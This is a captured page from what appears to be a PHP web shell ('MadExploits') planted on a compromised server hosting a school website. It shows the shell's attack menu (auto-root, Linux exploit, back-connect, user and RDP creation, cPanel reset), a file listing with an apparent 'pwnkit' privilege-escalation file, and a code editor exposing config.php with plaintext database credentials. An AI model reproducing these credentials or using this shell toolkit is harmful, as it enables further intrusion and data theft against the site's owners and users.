Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.12.73.149
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
khichipur /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
khichipur
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
videos
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rw-r--r--
academic.php
10.43
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rw-r--r--
config.php
627
B
-rw-r--r--
contact.php
1.93
KB
-rw-r--r--
error_log
29.11
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
5.9
KB
-rw-r--r--
gallery.php
1.54
KB
-rw-r--r--
header.php
10.88
KB
-rw-r--r--
index.php
17.8
KB
-rw-r--r--
khichipur.zip
107.9
MB
-rw-r--r--
news-coverage.php
1.32
KB
-rw-r--r--
ok.txt
21
B
-rw-r--r--
pedagogy.php
2.77
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rw-r--r--
tc.php
3.14
KB
-rw-r--r--
theschool.php
4.26
KB
-rw-r--r--
wp-blog-header.php
4.57
KB
-rw-r--r--
wp-cron.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php $mysql_host="localhost"; $mysql_user="akal_dbadminacademy"; $mysql_password="2bPUx)uW@W.i"; $mysql_dname="akal_Khichipur_AA"; date_default_timezone_set('asia/Kolkata'); $con= mysqli_connect($mysql_host, $mysql_user, $mysql_password, $mysql_dname) or die (mysqli_error()); if($con !=null) { echo '<h1> </h1>'; } else { echo '<h1>MySQL Server is not connected</h1>'; } session_start(); if(isset($_SESSION['login']) == 1){ echo "<script type='text/javascript'>window.location.replace = 'index.php'</script>"; } else { echo "<script type='text/javascript'>window.location.replace = 'login.php'</script>"; } ?>
Close